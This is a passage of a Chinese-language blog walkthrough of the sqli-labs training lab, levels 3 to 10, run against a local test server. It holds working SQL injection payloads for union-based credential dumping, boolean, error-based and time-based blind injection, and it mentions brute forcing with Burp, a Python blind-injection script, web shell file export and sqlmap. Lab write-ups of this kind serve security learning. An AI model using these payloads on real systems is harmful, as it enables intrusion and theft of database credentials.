<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggetaz9zvuj30ym07maan.jpg" alt="图片描述"></p>
<p>采用折半查找，找到一个最大的不报错的数字，则为该表的字段长度，这里为3；</p>
<h3 id="2-查询回显点：-2"><a href="#2-查询回显点：-2" class="headerlink" title="2.查询回显点："></a>2.查询回显点：</h3><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="regexp">//</span><span class="number">127.0</span>.<span class="number">0.1</span><span class="regexp">/sqli/</span>Less-<span class="number">3</span><span class="regexp">/?id=-1') union select 1,2,3%23</span></span><br></pre></td></tr></table></figure>

<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggetc1wrhcj30jr0bdgm6.jpg" alt="图片描述"></p>
<p>由图可知回显点为第二、第三个字段，所以我们之后查询的内容要放在第二、第三字段才会显示；</p>
<h3 id="3-查询数据库版本信息：-2"><a href="#3-查询数据库版本信息：-2" class="headerlink" title="3.查询数据库版本信息："></a>3.查询数据库版本信息：</h3><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="regexp">//</span><span class="number">127.0</span>.<span class="number">0.1</span><span class="regexp">/sqli/</span>Less-<span class="number">3</span><span class="regexp">/?id=-1') union select 1,version(),3%23</span></span><br></pre></td></tr></table></figure>

<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggetcxljbcj30mj0bfgmb.jpg" alt="图片描述"></p>
<h3 id="4-查询当前数据库和用户：-2"><a href="#4-查询当前数据库和用户：-2" class="headerlink" title="4.查询当前数据库和用户："></a>4.查询当前数据库和用户：</h3><figure class="highlight n1ql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli/Less-3/?id=-1') union <span class="keyword">select</span> <span class="number">1</span>,<span class="keyword">database</span>(),<span class="keyword">user</span>()%<span class="number">23</span></span><br></pre></td></tr></table></figure>

<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggetdkmj0nj30oo0asmxz.jpg" alt="图片描述"></p>
<h3 id="5-查询所有数据库：-2"><a href="#5-查询所有数据库：-2" class="headerlink" title="5.查询所有数据库："></a>5.查询所有数据库：</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli/Less-3/?id=-1') union <span class="keyword">select</span> <span class="number">1</span>,(<span class="keyword">select</span> <span class="keyword">group_concat</span>(schema_name) <span class="keyword">from</span> information_schema.schemata),<span class="number">3</span>%<span class="number">23</span></span><br></pre></td></tr></table></figure>

<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggeteecwxdj31cz0c9wgx.jpg" alt="图片描述"></p>
<h3 id="6-查询表名：-2"><a href="#6-查询表名：-2" class="headerlink" title="6.查询表名："></a>6.查询表名：</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli/Less-3/?id=-1') union <span class="keyword">select</span> <span class="number">1</span>,(<span class="keyword">select</span> <span class="keyword">group_concat</span>(table_name) <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema=<span class="string">'security'</span>),<span class="number">3</span>%<span class="number">23</span></span><br></pre></td></tr></table></figure>

<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggetf9uslzj31c70bnjse.jpg" alt="图片描述"></p>
<h3 id="7-查询列名：-2"><a href="#7-查询列名：-2" class="headerlink" title="7.查询列名："></a>7.查询列名：</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli/Less-3/?id=-1') union <span class="keyword">select</span> <span class="number">1</span>,(<span class="keyword">select</span> <span class="keyword">group_concat</span>(column_name) <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_schema=<span class="string">'security'</span> <span class="keyword">and</span> table_name=<span class="string">'users'</span>),<span class="number">3</span>%<span class="number">23</span></span><br></pre></td></tr></table></figure>

<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggetfzmlttj31et0apgmq.jpg" alt="图片描述"></p>
<h3 id="8-查询用户名和密码：-2"><a href="#8-查询用户名和密码：-2" class="headerlink" title="8.查询用户名和密码："></a>8.查询用户名和密码：</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli/Less-3/?id=-1') union <span class="keyword">select</span> <span class="number">1</span>,(<span class="keyword">select</span> <span class="keyword">group_concat</span>(username separator <span class="string">';'</span>) <span class="keyword">from</span> <span class="keyword">users</span>),(<span class="keyword">select</span> <span class="keyword">group_concat</span>(<span class="keyword">password</span> separator <span class="string">';'</span>) <span class="keyword">from</span> <span class="keyword">users</span>)%<span class="number">23</span></span><br></pre></td></tr></table></figure>

<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggetgi5drbj31fo08x0ua.jpg" alt="图片描述"></p>
<h1 id="第四关字符型注入-解析过程"><a href="#第四关字符型注入-解析过程" class="headerlink" title="第四关字符型注入 解析过程"></a>第四关字符型注入 解析过程</h1><p>本题与第一题类似，<strong>区别就是判断闭合点</strong></p>
<h3 id="‘’判断闭合点-1"><a href="#‘’判断闭合点-1" class="headerlink" title="‘’判断闭合点"></a>‘’判断闭合点</h3><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="regexp">//</span><span class="number">127.0</span>.<span class="number">0.1</span><span class="regexp">/sqli/</span>Less-<span class="number">4</span><span class="regexp">/?id=1'</span></span><br></pre></td></tr></table></figure>

<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdi29d8evj317w0cegns.jpg" alt="图片描述"></p>
<p>以下都和第一题类似，本文不在复述</p>
<h3 id="1-查询字段：-3"><a href="#1-查询字段：-3" class="headerlink" title="1.查询字段："></a>1.查询字段：</h3><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="regexp">//</span><span class="number">127.0</span>.<span class="number">0.1</span><span class="regexp">/sqli/</span>Less-<span class="number">4</span><span class="regexp">/?id=1") order by 5%23</span></span><br></pre></td></tr></table></figure>

<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggeti0joedj30wl0asmy8.jpg" alt="图片描述"></p>
<p>采用折半查找，找到一个最大的不报错的数字，则为该表的字段长度，这里为3；</p>
<h3 id="2-查询回显点：-3"><a href="#2-查询回显点：-3" class="headerlink" title="2.查询回显点："></a>2.查询回显点：</h3><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="regexp">//</span><span class="number">127.0</span>.<span class="number">0.1</span><span class="regexp">/sqli/</span>Less-<span class="number">4</span><span class="regexp">/?id=") union select 1,2,3%23</span></span><br></pre></td></tr></table></figure>

<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggetijq2vuj30ub088gm3.jpg" alt="图片描述"></p>
<p>由图可知回显点为第二、第三个字段，所以我们之后查询的内容要放在第二、第三字段才会显示；</p>
<h3 id="3-查询数据库版本信息：-3"><a href="#3-查询数据库版本信息：-3" class="headerlink" title="3.查询数据库版本信息："></a>3.查询数据库版本信息：</h3><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="regexp">//</span><span class="number">127.0</span>.<span class="number">0.1</span><span class="regexp">/sqli/</span>Less-<span class="number">4</span><span class="regexp">/?id=") union select 1,version(),3%23</span></span><br></pre></td></tr></table></figure>

<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggetiwdkjpj30wm08lgm6.jpg" alt="图片描述"></p>
<h3 id="4-查询当前数据库和用户：-3"><a href="#4-查询当前数据库和用户：-3" class="headerlink" title="4.查询当前数据库和用户："></a>4.查询当前数据库和用户：</h3><figure class="highlight n1ql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli/Less-4/?id=") union <span class="keyword">select</span> <span class="number">1</span>,<span class="keyword">database</span>(),<span class="keyword">user</span>()%<span class="number">23</span></span><br></pre></td></tr></table></figure>

<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggetjdtt3tj312i09jdgm.jpg" alt="图片描述"></p>
<h3 id="5-查询所有数据库：-3"><a href="#5-查询所有数据库：-3" class="headerlink" title="5.查询所有数据库："></a>5.查询所有数据库：</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli/Less-4/?id=") union <span class="keyword">select</span> <span class="number">1</span>,(<span class="keyword">select</span> <span class="keyword">group_concat</span>(schema_name) <span class="keyword">from</span> information_schema.schemata),<span class="number">3</span>%<span class="number">23</span></span><br></pre></td></tr></table></figure>

<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggetjuhn18j317h08rt9n.jpg" alt="图片描述"></p>
<h3 id="6-查询表名：-3"><a href="#6-查询表名：-3" class="headerlink" title="6.查询表名："></a>6.查询表名：</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli/Less-4/?id=") union <span class="keyword">select</span> <span class="number">1</span>,(<span class="keyword">select</span> <span class="keyword">group_concat</span>(table_name) <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema=<span class="string">'security'</span>),<span class="number">3</span>%<span class="number">23</span></span><br></pre></td></tr></table></figure>

<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggetk6wh1lj31au08zq3x.jpg" alt="图片描述"></p>
<h3 id="7-查询列名：-3"><a href="#7-查询列名：-3" class="headerlink" title="7.查询列名："></a>7.查询列名：</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli/Less-4/?id=") union <span class="keyword">select</span> <span class="number">1</span>,(<span class="keyword">select</span> <span class="keyword">group_concat</span>(column_name) <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_schema=<span class="string">'security'</span> <span class="keyword">and</span> table_name=<span class="string">'users'</span>),<span class="number">3</span>%<span class="number">23</span></span><br></pre></td></tr></table></figure>

<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggetkw5kopj31ae095dgt.jpg" alt="图片描述"></p>
<h3 id="8-查询用户名和密码：-3"><a href="#8-查询用户名和密码：-3" class="headerlink" title="8.查询用户名和密码："></a>8.查询用户名和密码：</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli/Less-4/?id=") union <span class="keyword">select</span> <span class="number">1</span>,(<span class="keyword">select</span> <span class="keyword">group_concat</span>(username separator <span class="string">';'</span>) <span class="keyword">from</span> <span class="keyword">users</span>),(<span class="keyword">select</span> <span class="keyword">group_concat</span>(<span class="keyword">password</span> separator <span class="string">';'</span>) <span class="keyword">from</span> <span class="keyword">users</span>)%<span class="number">23</span></span><br></pre></td></tr></table></figure>

<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggetlcivrhj31f4095gn4.jpg" alt="图片描述"></p>
<h1 id="第五关（布尔盲注）"><a href="#第五关（布尔盲注）" class="headerlink" title="第五关（布尔盲注）"></a>第五关（布尔盲注）</h1><h3 id="1-先看是否有注入点"><a href="#1-先看是否有注入点" class="headerlink" title="1.先看是否有注入点"></a>1.先看是否有注入点</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;127.0.0.1&#x2F;sqli&#x2F;Less-5&#x2F;?id&#x3D;1&#39;</span><br></pre></td></tr></table></figure>

<h3 id="2-查看有多少列"><a href="#2-查看有多少列" class="headerlink" title="2.查看有多少列"></a>2.查看有多少列</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;127.0.0.1&#x2F;sqli&#x2F;Less-5&#x2F;?id&#x3D;1&#39; order by 3 %23</span><br></pre></td></tr></table></figure>

<h3 id="3-判断当前数据库名称"><a href="#3-判断当前数据库名称" class="headerlink" title="3.判断当前数据库名称"></a>3.判断当前数据库名称</h3><h4 id="方法1"><a href="#方法1" class="headerlink" title="方法1"></a>方法1</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;127.0.0.1&#x2F;sqli&#x2F;Less-5&#x2F;?id&#x3D;1&#39; and left((select database()),1)&#x3D;&#39;s&#39; %23</span><br><span class="line"></span><br><span class="line">%通过BURPSUITE或者python来进行爆破，必要时候手动</span><br></pre></td></tr></table></figure>

<h4 id="方法2"><a href="#方法2" class="headerlink" title="方法2"></a>方法2</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;127.0.0.1&#x2F;sqli&#x2F;Less-5&#x2F;</span><br><span class="line">?id&#x3D;1&#39; and  ascii(substr((select database()),1,1))&gt;110 %23</span><br><span class="line"></span><br><span class="line">同样需要BURPSUITE或者python进行爆破，只不过方式不一样</span><br></pre></td></tr></table></figure>

<p>最后只要和正常注入的方法一样进行判断就行了</p>
<ol start="4">
<li><h4 id="完整的注入流程"><a href="#完整的注入流程" class="headerlink" title="完整的注入流程"></a>完整的注入流程</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">完整注入流程：</span><br><span class="line">1. http:&#x2F;&#x2F;127.0.0.1&#x2F;sqli&#x2F;Less-5&#x2F;?id&#x3D;1’ and  ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) &gt;100 %23 通过二分法猜解得到所有的库,红色为可变参数。</span><br><span class="line">2. http:&#x2F;&#x2F;127.0.0.1&#x2F;sqli&#x2F;Less-5&#x2F;?id&#x3D;1’ and ascii(substr((select table_name from information_schema.tables where table_schema&#x3D;0x7365637572697479 limit 1,1),1,1))&gt;1%23  再次通过二分法可猜解得到security下的所有表。其中，红色为可变参数。</span><br><span class="line">3. http:&#x2F;&#x2F;127.0.0.1&#x2F;sqli&#x2F;Less-5&#x2F;?id&#x3D;1’ and ascii(substr((select column_name from information_schema.columns where table_name&#x3D;0x7573657273 limit 1,1),1,1)) &gt;1 %23通过二分法可猜解users内的字段，其中红色为可变参数。</span><br><span class="line">4. http:&#x2F;&#x2F;127.0.0.1&#x2F;sqli&#x2F;Less-5&#x2F;?id&#x3D;1’  and ascii(substr((select username from security.users limit 1,1),1,1))&gt;1 %23继续猜解即可得到字段内的值。</span><br></pre></td></tr></table></figure>

<h5 id="爆破过程"><a href="#爆破过程" class="headerlink" title="爆破过程"></a>爆破过程</h5><p>1.挂上busp的代理</p>
<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdiammb6dj31cj0f7ady.jpg" alt="图片描述"></p>
<p>2.拦截成功</p>
<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdidgwq1rj31gq0s10w7.jpg" alt="图片描述"></p>
<p>3.开始爆破前的准备</p>
<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdieet72aj31gq0s3n2h.jpg" alt="图片描述"></p>
<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdigc6mr0j31f308ttad.jpg" alt="图片描述"></p>
<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdiinkv3gj31f50h3wgj.jpg" alt="图片描述"></p>
<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdimcc5rlj30up0nqjue.jpg" alt="图片描述"></p>
<p>重复爆破，一次类推</p>
</li>
</ol>
<h2 id="第五关（报错注入（rand-group-count-））"><a href="#第五关（报错注入（rand-group-count-））" class="headerlink" title="第五关（报错注入（rand() + group() + count()））"></a>第五关（报错注入（rand() + group() + count()））</h2><h3 id="1、报错原因："><a href="#1、报错原因：" class="headerlink" title="1、报错原因："></a>1、报错原因：</h3><p>其原因主要是因为虚拟表的主键重复。按照MySQL的官方说法，group by要进行两次运算，第一次是拿group by后面的字段值到虚拟表中去对比前，首先获取group by后面的值；第二次是假设group by后面的字段的值在虚拟表中不存在，那就需要把它插入到虚拟表中，这里在插入时会进行第二次运算，由于rand函数存在一定的随机性，所以第二次运算的结果可能与第一次运算的结果不一致，但是这个运算的结果可能在虚拟表中已经存在了，那么这时的插入必然导致主键的重复，进而引发错误。</p>
<blockquote>
<p>​    需要用到的函数的主要作用：<br>​    floor函数的作用是返回小于等于该值的最大整数,也可以理解为向下取整只保留整数部分。<br>​    Count是一个计数函数。<br>​    Group by语句用于结合合计函数，根据一个或多个列对结果集进行分组。<br>​    rand()函数可以用来生成0或1</p>
</blockquote>
<h3 id="2、查询库名："><a href="#2、查询库名：" class="headerlink" title="2、查询库名："></a>2、查询库名：</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;127.0.0.1&#x2F;sqli&#x2F;Less-5&#x2F;?id&#x3D;-1&#39; union select  1,count(*),concat((select schema_name from information_schema.schemata limit 0,1), floor(rand(0)*2))as a from information_schema.schemata group by a %23</span><br></pre></td></tr></table></figure>

<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdjmyzxj0j31au0bltcu.jpg" alt="图片描述"></p>
<p>重复以上步骤就可以快速得出库名</p>
<h3 id="3、查询表名"><a href="#3、查询表名" class="headerlink" title="3、查询表名"></a>3、查询表名</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;127.0.0.1&#x2F;sqli&#x2F;Less-5&#x2F;?id&#x3D;-1&#39; union select  1,count(*),concat((select table_name from information_schema.tables where table_schema&#x3D;database() limit 3,1), floor(rand(0)*2))as a from information_schema.schemata group by a %23</span><br></pre></td></tr></table></figure>

<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdjsgft4cj31c90a4jv6.jpg" alt="图片描述"></p>
<h3 id="4、查询字段名"><a href="#4、查询字段名" class="headerlink" title="4、查询字段名"></a>4、查询字段名</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;127.0.0.1&#x2F;sqli&#x2F;Less-5&#x2F;?id&#x3D;-1&#39; union select  1,count(*),concat((select column_name from information_schema.columns where table_name&#x3D;&#39;users&#39; limit 1,1), floor(rand(0)*2))as a from information_schema.schemata group by a %23</span><br></pre></td></tr></table></figure>

<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdjv8cq71j31bs0b3tcm.jpg" alt="图片描述"></p>
<h3 id="5、查询数据"><a href="#5、查询数据" class="headerlink" title="5、查询数据"></a>5、查询数据</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;127.0.0.1&#x2F;sqli&#x2F;Less-5&#x2F;?id&#x3D;-1&#39; union select  1,count(*),concat((select username from security.users limit 0,1), floor(rand(0)*2))as a from information_schema.schemata group by a %23</span><br></pre></td></tr></table></figure>

<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdk2p98hkj31e30a1wi7.jpg" alt="图片描述"></p>
<h2 id="第六关（盲注）-采用python的方式"><a href="#第六关（盲注）-采用python的方式" class="headerlink" title="第六关（盲注） 采用python的方式"></a>第六关（盲注） 采用python的方式</h2><h3 id="利用requests库-threading库-盲注"><a href="#利用requests库-threading库-盲注" class="headerlink" title="利用requests库+threading库+盲注"></a>利用requests库+threading库+盲注</h3><h4 id="requests库的作用："><a href="#requests库的作用：" class="headerlink" title="requests库的作用："></a>requests库的作用：</h4><p>​    通过requests库获取网页，再通过解码判断字符</p>
<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1ggg4cnodc2j30dn04b0st.jpg" alt="图片描述"></p>
<h4 id="threading库的作用："><a href="#threading库的作用：" class="headerlink" title="threading库的作用："></a>threading库的作用：</h4><h5 id="利用线程全速获取网页请求，让盲注变得不这么慢"><a href="#利用线程全速获取网页请求，让盲注变得不这么慢" class="headerlink" title="利用线程全速获取网页请求，让盲注变得不这么慢"></a>利用线程全速获取网页请求，让盲注变得不这么慢</h5><p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1ggg4hzxnp0j30wu03jdg3.jpg" alt="图片描述"></p>
<h5 id="优点：好像除了速度快就没啥了"><a href="#优点：好像除了速度快就没啥了" class="headerlink" title="优点：好像除了速度快就没啥了"></a>优点：好像除了速度快就没啥了</h5><h5 id="缺点：因为多线程的缘故，同步锁好像启动不了，容易不按照顺序获取字符串，可能往二分法改进会更好，但是目前没有思路利用threading-二分法"><a href="#缺点：因为多线程的缘故，同步锁好像启动不了，容易不按照顺序获取字符串，可能往二分法改进会更好，但是目前没有思路利用threading-二分法" class="headerlink" title="缺点：因为多线程的缘故，同步锁好像启动不了，容易不按照顺序获取字符串，可能往二分法改进会更好，但是目前没有思路利用threading+二分法"></a>缺点：因为多线程的缘故，同步锁好像启动不了，容易不按照顺序获取字符串，可能往二分法改进会更好，但是目前没有思路利用threading+二分法</h5><h4 id="结果："><a href="#结果：" class="headerlink" title="结果："></a>结果：</h4><p>​    数据库库名查询：</p>
<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1ggg5443tklj30s106gaak.jpg" alt="图片描述"></p>
<p>​    数据库所查库的表明查询：</p>
<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1ggg5586cnmj30m503i74g.jpg" alt="图片描述"></p>
<p>​    数据库所查库的字段名查询：</p>
<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1ggg5atnmsej30i102ywen.jpg" alt="图片描述"></p>
<p>​    数据库所查字段的所有记录：</p>
<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1ggg5g0mom1j318d02cjrh.jpg" alt="图片描述"></p>
<h2 id="第七关-文件导出"><a href="#第七关-文件导出" class="headerlink" title="第七关 文件导出"></a>第七关 文件导出</h2><p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdv8l7n8cj315c08cjsf.jpg" alt="图片描述"></p>
<p>已经可以实现菜刀互相连接</p>
<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdvamcek4j31fo0puacs.jpg" alt="图片描述"></p>
<h2 id="第八题-采用sqlmap进行注入"><a href="#第八题-采用sqlmap进行注入" class="headerlink" title="第八题 采用sqlmap进行注入"></a>第八题 采用sqlmap进行注入</h2><h3 id="1、看一下是否可以注入"><a href="#1、看一下是否可以注入" class="headerlink" title="1、看一下是否可以注入"></a>1、看一下是否可以注入</h3><p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdvkcb91pj30qo0sctc6.jpg" alt="图片描述"></p>
<p>发现可以注入</p>
<h3 id="2、查询库"><a href="#2、查询库" class="headerlink" title="2、查询库"></a>2、查询库</h3><p><img src="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggemlwglufj30l602h3yf.jpg" alt="图片描述"></p>
<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggdwvd8ah3j30qr0543yk.jpg" alt="图片描述"></p>
<h3 id="3、查询表"><a href="#3、查询表" class="headerlink" title="3、查询表"></a>3、查询表</h3><p><img src="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggemk0szn3j30px05awel.jpg" alt="图片描述"></p>
<h3 id="4、查询字段"><a href="#4、查询字段" class="headerlink" title="4、查询字段"></a>4、查询字段</h3><p><img src="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggemomkc61j30qf03dglp.jpg" alt="图片描述"></p>
<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggemou759hj30oq0a6dga.jpg" alt="图片描述"></p>
<h2 id="第九题（基于时间盲注）"><a href="#第九题（基于时间盲注）" class="headerlink" title="第九题（基于时间盲注）"></a>第九题（基于时间盲注）</h2><h3 id="1、判断是否存在注入"><a href="#1、判断是否存在注入" class="headerlink" title="1、判断是否存在注入"></a>1、判断是否存在注入</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;127.0.0.1&#x2F;sqli&#x2F;Less-9&#x2F;?id&#x3D;1&#39; and sleep(5)%23</span><br></pre></td></tr></table></figure>

<p>如果有注入的话，会延时5m在返回</p>
<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1gggxtclvsbj30ke0ld0vt.jpg" alt="图片描述"></p>
<h3 id="2、判断当前数据库的长度"><a href="#2、判断当前数据库的长度" class="headerlink" title="2、判断当前数据库的长度"></a>2、判断当前数据库的长度</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;127.0.0.1&#x2F;sqli&#x2F;Less-9&#x2F;?id&#x3D;1&#39; and if(length(database())&#x3D;8,1,sleep(5)) %23</span><br></pre></td></tr></table></figure>

<p>如果长度等于8，则马上返回，不等于8则延时返回</p>
<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1gggxwvz7u4j31hb05tq3e.jpg" alt="图片描述"></p>
<h3 id="3、判断所有数据库的名字"><a href="#3、判断所有数据库的名字" class="headerlink" title="3、判断所有数据库的名字"></a>3、判断所有数据库的名字</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;127.0.0.1&#x2F;sqli&#x2F;Less-9&#x2F;?id&#x3D;1&#39; and if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),1,1))&gt;1000,1,sleep(5)) %23</span><br></pre></td></tr></table></figure>

<p>用软件和工具更加方便</p>
<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1gggxz5432uj31hc07v74u.jpg" alt="图片描述"></p>
<h3 id="4、判断当前库里面的所有表名"><a href="#4、判断当前库里面的所有表名" class="headerlink" title="4、判断当前库里面的所有表名"></a>4、判断当前库里面的所有表名</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;127.0.0.1&#x2F;sqli&#x2F;Less-9&#x2F;?id&#x3D;1&#39; and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema&#x3D;database()),1,1))&gt;1000,1,sleep(5)) %23</span><br></pre></td></tr></table></figure>

<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1gggy1sbjm9j31hc0823z0.jpg" alt="图片描述"></p>
<h3 id="5、判断当前表里所有的字段名"><a href="#5、判断当前表里所有的字段名" class="headerlink" title="5、判断当前表里所有的字段名"></a>5、判断当前表里所有的字段名</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli/Less-9/</span><br><span class="line">?id=1' and if(ascii(substr((<span class="keyword">select</span> <span class="keyword">group_concat</span>(column_name) <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_schema=<span class="string">'users'</span>),<span class="number">1</span>,<span class="number">1</span>))&gt;<span class="number">1000</span>,<span class="number">1</span>,<span class="keyword">sleep</span>(<span class="number">5</span>)) %<span class="number">23</span></span><br></pre></td></tr></table></figure>

<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1gggy2k8hshj31hc0823z0.jpg" alt="图片描述"></p>
<h2 id="第十题（基于时间盲注）"><a href="#第十题（基于时间盲注）" class="headerlink" title="第十题（基于时间盲注）"></a>第十题（基于时间盲注）</h2><h3 id="1、判断是否存在注入-1"><a href="#1、判断是否存在注入-1" class="headerlink" title="1、判断是否存在注入"></a>1、判断是否存在注入</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;127.0.0.1&#x2F;sqli&#x2F;Less-10&#x2F;?id&#x3D;1&quot; and sleep(5)%23</span><br></pre></td></tr></table></figure>

<p>如果有注入的话，会延时5m在返回</p>
<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1gggy3s7z5qj31hc0bomya.jpg" alt="图片描述"></p>
<h3 id="2、判断当前数据库的长度-1"><a href="#2、判断当前数据库的长度-1" class="headerlink" title="2、判断当前数据库的长度"></a>2、判断当前数据库的长度</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;127.0.0.1&#x2F;sqli&#x2F;Less-10&#x2F;?id&#x3D;1&quot; and if(length(database())&#x3D;8,1,sleep(5)) %23</span><br></pre></td></tr></table></figure>

<p>如果长度等于8，则马上返回，</p>
<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1gggy5zk8swj31hc08kdgd.jpg" alt="图片描述"></p>
<p>不等于8则延时返回</p>
